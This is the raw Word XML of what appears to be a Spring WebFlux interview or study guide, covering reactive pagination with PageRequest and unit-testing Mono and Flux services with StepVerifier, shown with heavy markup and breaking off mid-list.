    <w:p w14:paraId="42A21414"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE92592"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domain.PageRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315337DE"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import org.springframework.stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609313B7"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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05684C0B" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D39FF71"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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0509436F"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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6CA156" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157639EF"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7399498E"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ItemRepository itemRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA7D494" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="739325AD"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Flux&lt;Item&gt; getItemsByPage(int page, int size) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F195DF9"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ageRequest pageRequest = PageRequest.of(page, size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B370AAD"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Repository.findAllBy(pageRequest);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A15402"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4D209D4E"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773F853C" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A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ontroller Layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE74F13"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D1648A"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web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0AFDC3"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Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B616F3" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E9B64CF"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A772ED8"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questMapping("/api/items")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094CDF8D"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Controller {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6528D7D9" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AED7F70"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343EE333"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ItemService itemService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9EEA93" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A99FB71"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etMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10500993"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Flux&lt;Item&gt; getItems(@RequestParam(defaultValue = "0") int page,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698C18FA"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questParam(defaultValue = "10") int size) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA72116"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Service.getItemsByPage(page, size);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAD22E8"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0920F6ED" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E"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50AD9101" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E"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onclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA0A1F7" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>By using Mono and Flux in Spring WebFlux, you can paginate large datasets efficiently without blocking the application. You can leverage PageRequest for reactive repositories to ensure only the necessary subset of data is fetched, maintaining non-blocking performance and handling backpressure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6721E7A9"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45D7A82">
          <v:rect id="_x0000_i2329" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC138C1" w14:textId="4E0416AD"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26" w:name="_Toc196308006"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain how you would test a reactive Spring WebFlux service</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="526"/>
    </w:p>
    <w:p w14:paraId="1194C8BE" w14:textId="5D910921" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1"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esting a reactive </w:t>
      </w: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xml:space="preserve"> service involves ensuring that the reactive components (like Mono and Flux) are behaving correctly, both in terms of data flow and error handling. Testing also involves checking the asynchronous behavior of the service without blocking the test execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E5DC72"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Here's a step-by-step guide on how you would test a reactive Spring WebFlux service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7446B676" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1"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 Set Up Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D2BDC8"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ake sure you include the necessary dependencies for Spring WebFlux testing. The key dependencies include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC797AB"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boot-starter-test (for general testing support)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6612582E"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boot-starter-webflux (for Spring WebFlux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CDCD7A"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actor-test (for testing reactive streams like Mono and Flux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A50A952"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or Maven:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437C8D20"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t;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3ED267"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311A81BA"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artifactId&gt;spring-boot-starter-webflux&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EF7AE9"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t;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4B1B47"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t;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02625C72"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1281393D"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artifactId&gt;spring-boot-starter-test&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027D9901"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 xml:space="preserve">    &lt;scope&gt;test&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27637C8D"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t;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE081D"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t;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657A17AD"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groupId&gt;io.projectreactor&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB2B35"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artifactId&gt;reactor-test&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E53E30"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t;scope&gt;test&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8F782C"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t;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27022DCA"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or Gradle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A37753"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estImplementation 'org.springframework.boot:spring-boot-starter-webflux'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2575EF"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estImplementation 'org.springframework.boot:spring-boot-starter-test'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2A0FF0"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estImplementation 'io.projectreactor:reactor-test'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B25A48" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1"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2. Write Unit Tests for Reactive Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003E4BCF"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Use @WebFluxTest for testing your controller layer and @MockBean to mock dependencies like services or repositories. You can also use @DataMongoTest or @WebFluxTest when working with databases. In most cases, you'll use StepVerifier from </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor Test</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to test reactive streams (Mono or Flux).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EEFAE5"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Here’s how you can test a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1C13F6" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1"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 Service Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F369478"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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEA79BE"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4D1FB4" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52C60046"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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11056D00"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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18335E3D" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05B2F759"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Item&gt; getItemById(String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC7B2C0"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Simulating service logic (in reality, this might fetch from DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31214A0A"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f ("1".equals(id)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652236C0"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Mono.just(new Item(id, "Test Item", 100.0));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9B4AC6"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1C9084C5"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Mono.empty();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F423056"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59454AFA" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="525A3CD9"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Flux&lt;Item&gt; getAllItems() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADD3D7A"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Flux.just(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C59B2"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new Item("1", "Item 1", 100.0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5759DC8D"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new Item("2", "Item 2", 200.0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6EF3BA"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new Item("3", "Item 3", 300.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1488ECA2"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63EAAFF5"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3D6D312E"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2104901F" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1"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 Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4719CA01"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436772E9"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web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B039B8"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA34951" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C40A3D6"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DA0283"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questMapping("/api/items")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349F3727"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Controller {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B13ABA8" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CAD39BB"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8C6B6A"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ItemService itemService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720188FD" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FF136B0"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etMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CBE39E"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Item&gt; getItem(@PathVariable String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE7EA88"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Service.getItemById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1D3DD8"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7FDA6A85" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79357576"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 xml:space="preserve">    @GetMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E82788"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Flux&lt;Item&gt; getAllItems() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F414307"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temService.getAllItems();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B54D58"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0764EEBB"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46273388" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1"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3. Write Tests for the Service Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F0B9B4"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se StepVerifier for testing reactive types. StepVerifier helps to assert how reactive types (like Mono and Flux) should behave during their lifecycle. It allows you to verify the expected elements, number of elements, or errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76110B4C" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1"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Service Layer Test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EB6BCF"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junit.jupiter.api.Test;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109387CB"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CD34F1"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test.StepVerifier;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0974ABE4" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BF2EEFE"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ServiceTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C763B6" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29490400"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final ItemService itemService = new ItemService();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712B4764" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245ECDE7"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640DD315"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void testGetItemById() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0167C75E"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Mono&lt;Item&gt; result = itemService.getItemById("1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0558027F" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C646F19"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StepVerifier checks the value in the Mono</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5406D074"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tepVerifier.create(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2477DFCD"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pectNextMatches(item -&gt; item.getId().equals("1") &amp;&amp; item.getName().equals("Test Item"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D17B9D"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pectComplete()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707FFC17"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verify();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F6F830"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359C30C4" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44079543"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F5FECF"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void testGetItemByIdNotFound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053D3261"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Mono&lt;Item&gt; result = itemService.getItemById("unknown");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C26B5D" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="189D8423"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tepVerifier.create(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE2F2C7"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pectComplete()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3688A1BF"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verify();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B1F421"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6FEF645C" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEA1D79"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29799522"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void testGetAllItems() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385AFB97"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Flux&lt;Item&gt; result = itemService.getAllItems();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15729937" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="686C7FC9"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tepVerifier.create(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256F33B0"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pectNextMatches(item -&gt; item.getName().equals("Item 1"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361EAF78"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pectNextMatches(item -&gt; item.getName().equals("Item 2"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E61D7"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pectNextMatches(item -&gt; item.getName().equals("Item 3"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3C4761"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pectComplete()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298B18A6"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verify();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583D6BEC"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476231D9"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1D1F2801" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1"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Key Concepts of the Test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4E5D7E"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tepVerifier.create()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Creates a StepVerifier instance from the Mono or Flux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C658E48"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pectNextMatches()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Asserts the value returned in each element emitted by the reactive stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F101C06"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pectComplete()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
